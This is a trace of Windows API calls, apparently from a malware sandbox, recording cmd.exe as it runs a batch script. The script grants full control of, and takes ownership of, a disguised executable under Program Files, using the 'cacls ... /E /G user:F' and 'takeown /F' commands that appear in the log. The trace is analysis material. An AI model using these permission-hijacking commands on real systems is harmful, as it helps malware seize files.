[0179.826] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f374 | out: lpMode=0x26f374) returned 1 [0179.826] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.826] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f3a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f3a0*=0x2) returned 1 [0179.827] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0179.827] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0179.827] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x26f3b0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0179.827] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x26f3b0 | out: _Buffer=">") returned 1 [0179.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.828] GetFileType (hFile=0x7) returned 0x2 [0179.828] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0179.828] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f378 | out: lpMode=0x26f378) returned 1 [0179.829] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.829] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x26f3a4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x26f3a4*=0x26) returned 1 [0179.830] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.830] GetFileType (hFile=0x7) returned 0x2 [0179.830] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0179.830] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5fc | out: lpMode=0x26f5fc) returned 1 [0179.831] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.831] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5a4198*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x26f628, lpReserved=0x0 | out: lpBuffer=0x5a4198*, lpNumberOfCharsWritten=0x26f628*=0x5) returned 1 [0179.831] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x26f634 | out: _Buffer=" \"C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 93 [0179.831] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.831] GetFileType (hFile=0x7) returned 0x2 [0179.832] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0179.832] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5f4 | out: lpMode=0x26f5f4) returned 1 [0179.832] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.832] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x5d, lpNumberOfCharsWritten=0x26f620, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f620*=0x5d) returned 1 [0179.832] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f654 | out: _Buffer="\r\n") returned 2 [0179.832] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.833] GetFileType (hFile=0x7) returned 0x2 [0179.833] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0179.833] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f614 | out: lpMode=0x26f614) returned 1 [0179.834] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.834] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f640, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f640*=0x2) returned 1 [0179.834] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0179.834] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0179.834] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0179.834] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0179.835] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0179.835] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0179.835] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0179.835] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0179.835] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0179.835] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0179.835] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0179.835] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0179.835] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0179.835] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0179.835] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0179.835] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0179.835] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0179.835] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0179.836] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0179.836] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0179.836] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0179.836] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0179.836] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0179.836] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0179.836] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0179.836] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0179.836] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0179.836] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0179.836] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0179.836] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0179.836] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0179.836] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0179.836] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0179.836] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0179.836] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0179.836] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0179.837] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0179.837] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0179.837] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0179.837] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0179.837] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0179.837] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0179.837] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0179.837] GetProcessHeap () returned 0x590000 [0179.837] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x418) returned 0x5a4280 [0179.837] SetErrorMode (uMode=0x0) returned 0x0 [0179.837] SetErrorMode (uMode=0x1) returned 0x0 [0179.837] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5a4288, lpFilePart=0x26f3f8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26f3f8*="Desktop") returned 0x25 [0179.837] SetErrorMode (uMode=0x0) returned 0x1 [0179.837] GetProcessHeap () returned 0x590000 [0179.837] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a4280, Size=0x60) returned 0x5a4280 [0179.838] GetProcessHeap () returned 0x590000 [0179.838] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a4280) returned 0x60 [0179.838] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0179.838] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0179.838] GetProcessHeap () returned 0x590000 [0179.838] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x120) returned 0x5a42e8 [0179.838] GetProcessHeap () returned 0x590000 [0179.838] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x238) returned 0x5a4410 [0179.841] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0179.841] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x26f174, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f174) returned 0xffffffff [0179.841] GetLastError () returned 0x2 [0179.842] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x26f174, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f174) returned 0xffffffff [0179.842] GetLastError () returned 0x2 [0179.842] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0179.842] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x26f174, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f174) returned 0x5a45c0 [0179.842] GetProcessHeap () returned 0x590000 [0179.842] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a3688, Size=0x4) returned 0x5a3688 [0179.842] FindClose (in: hFindFile=0x5a45c0 | out: hFindFile=0x5a45c0) returned 1 [0179.843] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x26f174, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f174) returned 0xffffffff [0179.843] GetLastError () returned 0x2 [0179.843] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x26f174, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f174) returned 0x5a45c0 [0179.843] FindClose (in: hFindFile=0x5a45c0 | out: hFindFile=0x5a45c0) returned 1 [0179.843] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0179.843] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0179.843] GetConsoleTitleW (in: lpConsoleTitle=0x26f1c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0179.844] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5a48b8, lpFilePart=0x26ece4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26ece4*="Desktop") returned 0x25 [0179.844] SetErrorMode (uMode=0x0) returned 0x1 [0179.844] GetProcessHeap () returned 0x590000 [0179.844] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a48b0, Size=0x60) returned 0x5a48b0 [0179.844] GetProcessHeap () returned 0x590000 [0179.844] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a48b0) returned 0x60 [0179.844] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0179.844] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0179.844] GetProcessHeap () returned 0x590000 [0179.844] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x120) returned 0x5a4918 [0179.844] GetProcessHeap () returned 0x590000 [0179.844] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x238) returned 0x5a4a40 [0179.845] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0179.845] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x26ea60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ea60) returned 0xffffffff [0179.845] GetLastError () returned 0x2 [0179.845] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x26ea60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ea60) returned 0xffffffff [0179.846] GetLastError () returned 0x2 [0179.846] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0179.846] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x26ea60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ea60) returned 0x5a4bf0 [0179.847] FindClose (in: hFindFile=0x5a4bf0 | out: hFindFile=0x5a4bf0) returned 1 [0179.847] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x26ea60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ea60) returned 0xffffffff [0179.847] GetLastError () returned 0x2 [0179.847] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x26ea60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ea60) returned 0x5a4bf0 [0179.847] FindClose (in: hFindFile=0x5a4bf0 | out: hFindFile=0x5a4bf0) returned 1 [0179.848] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0179.848] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0179.848] GetConsoleTitleW (in: lpConsoleTitle=0x26ef58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0179.848] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ede0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26eea8 | out: lpAttributeList=0x26ede0, lpSize=0x26eea8) returned 1 [0179.848] UpdateProcThreadAttribute (in: lpAttributeList=0x26ede0, dwFlags=0x0, Attribute=0x60001, lpValue=0x26eea0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ede0, lpPreviousValue=0x0) returned 1 [0179.848] GetStartupInfoW (in: lpStartupInfo=0x26ed9c | out: lpStartupInfo=0x26ed9c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0179.848] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0179.851] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x26ee3c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26ee88 | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessInformation=0x26ee88*(hProcess=0x74, hThread=0x78, dwProcessId=0xad0, dwThreadId=0xb20)) returned 1 [0180.398] CloseHandle (hObject=0x78) returned 1 [0180.398] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0180.398] GetProcessHeap () returned 0x590000 [0180.398] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a5fb0 | out: hHeap=0x590000) returned 1 [0180.399] GetEnvironmentStringsW () returned 0x5a5fb0* [0180.399] GetProcessHeap () returned 0x590000 [0180.399] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb36) returned 0x5a6af0 [0180.399] FreeEnvironmentStringsW (penv=0x5a5fb0) returned 1 [0180.399] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0193.959] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x26ed7c | out: lpExitCode=0x26ed7c*=0x1f57) returned 1 [0193.959] CloseHandle (hObject=0x74) returned 1 [0193.959] _vsnwprintf (in: _Buffer=0x26eec4, _BufferCount=0x13, _Format="%08X", _ArgList=0x26ed88 | out: _Buffer="00001F57") returned 8 [0193.959] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00001F57") returned 1 [0193.959] GetProcessHeap () returned 0x590000 [0193.959] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6af0 | out: hHeap=0x590000) returned 1 [0193.959] GetEnvironmentStringsW () returned 0x5a5fb0* [0193.959] GetProcessHeap () returned 0x590000 [0193.959] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb5c) returned 0x5a8198 [0193.959] FreeEnvironmentStringsW (penv=0x5a5fb0) returned 1 [0193.959] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0193.959] GetProcessHeap () returned 0x590000 [0193.959] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8198 | out: hHeap=0x590000) returned 1 [0193.959] GetEnvironmentStringsW () returned 0x5a5fb0* [0193.959] GetProcessHeap () returned 0x590000 [0193.959] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb5c) returned 0x5a8198 [0193.960] FreeEnvironmentStringsW (penv=0x5a5fb0) returned 1 [0193.960] GetProcessHeap () returned 0x590000 [0193.960] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x590db8 | out: hHeap=0x590000) returned 1 [0193.960] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ede0 | out: lpAttributeList=0x26ede0) [0193.960] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.960] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0193.960] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.960] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0193.960] _get_osfhandle (_FileHandle=0) returned 0x3 [0193.960] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0193.961] SetConsoleInputExeNameW () returned 0x1 [0193.961] GetConsoleOutputCP () returned 0x1b5 [0193.961] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0193.961] SetThreadUILanguage (LangId=0x0) returned 0x409 [0193.961] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26f5fc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0193.962] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0193.962] _get_osfhandle (_FileHandle=3) returned 0x74 [0193.962] SetFilePointer (in: hFile=0x74, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0193.962] GetProcessHeap () returned 0x590000 [0193.962] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4b70 | out: hHeap=0x590000) returned 1 [0193.962] GetProcessHeap () returned 0x590000 [0193.962] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4a40 | out: hHeap=0x590000) returned 1 [0193.962] GetProcessHeap () returned 0x590000 [0193.962] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4918 | out: hHeap=0x590000) returned 1 [0193.962] GetProcessHeap () returned 0x590000 [0193.962] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a48b0 | out: hHeap=0x590000) returned 1 [0193.962] GetProcessHeap () returned 0x590000 [0193.962] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a47d8 | out: hHeap=0x590000) returned 1 [0193.962] GetProcessHeap () returned 0x590000 [0193.962] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a45c0 | out: hHeap=0x590000) returned 1 [0193.962] GetProcessHeap () returned 0x590000 [0193.962] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4540 | out: hHeap=0x590000) returned 1 [0193.962] GetProcessHeap () returned 0x590000 [0193.962] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4410 | out: hHeap=0x590000) returned 1 [0193.962] GetProcessHeap () returned 0x590000 [0193.963] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a42e8 | out: hHeap=0x590000) returned 1 [0193.963] GetProcessHeap () returned 0x590000 [0193.963] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4280 | out: hHeap=0x590000) returned 1 [0193.963] GetProcessHeap () returned 0x590000 [0193.963] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a41b0 | out: hHeap=0x590000) returned 1 [0193.963] GetProcessHeap () returned 0x590000 [0193.963] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4190 | out: hHeap=0x590000) returned 1 [0193.963] GetProcessHeap () returned 0x590000 [0193.963] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x591258 | out: hHeap=0x590000) returned 1 [0193.963] _get_osfhandle (_FileHandle=3) returned 0x74 [0193.963] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0193.963] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x26f5e0, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x26f5e0*=0xc2, lpOverlapped=0x0) returned 1 [0193.964] SetFilePointer (in: hFile=0x74, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0193.964] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0193.965] _get_osfhandle (_FileHandle=3) returned 0x74 [0193.965] GetFileType (hFile=0x74) returned 0x1 [0193.965] _get_osfhandle (_FileHandle=3) returned 0x74 [0193.965] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0193.965] GetProcessHeap () returned 0x590000 [0193.965] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5b4b28 [0193.965] GetProcessHeap () returned 0x590000 [0193.965] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b4b28 | out: hHeap=0x590000) returned 1 [0193.967] _tell (_FileHandle=3) returned 47 [0193.967] _close (_FileHandle=3) returned 0 [0193.967] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f3b4 | out: _Buffer="\r\n") returned 2 [0193.967] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.967] GetFileType (hFile=0x7) returned 0x2 [0193.968] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0193.968] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f374 | out: lpMode=0x26f374) returned 1 [0193.968] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.968] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f3a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f3a0*=0x2) returned 1 [0194.595] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0194.596] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0194.596] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x26f3b0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0194.596] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x26f3b0 | out: _Buffer=">") returned 1 [0194.596] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.596] GetFileType (hFile=0x7) returned 0x2 [0194.597] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0194.597] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f378 | out: lpMode=0x26f378) returned 1 [0194.598] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.598] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x26f3a4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x26f3a4*=0x26) returned 1 [0194.598] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.598] GetFileType (hFile=0x7) returned 0x2 [0194.599] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0194.599] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5fc | out: lpMode=0x26f5fc) returned 1 [0194.600] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.600] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5a4198*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x26f628, lpReserved=0x0 | out: lpBuffer=0x5a4198*, lpNumberOfCharsWritten=0x26f628*=0x7) returned 1 [0194.600] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x26f634 | out: _Buffer=" /F \"C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\" ") returned 64 [0194.600] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.600] GetFileType (hFile=0x7) returned 0x2 [0194.602] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0194.602] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5f4 | out: lpMode=0x26f5f4) returned 1 [0194.602] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.602] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x40, lpNumberOfCharsWritten=0x26f620, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f620*=0x40) returned 1 [0194.605] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f654 | out: _Buffer="\r\n") returned 2 [0194.605] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.605] GetFileType (hFile=0x7) returned 0x2 [0194.605] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0194.605] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f614 | out: lpMode=0x26f614) returned 1 [0194.606] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.606] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, 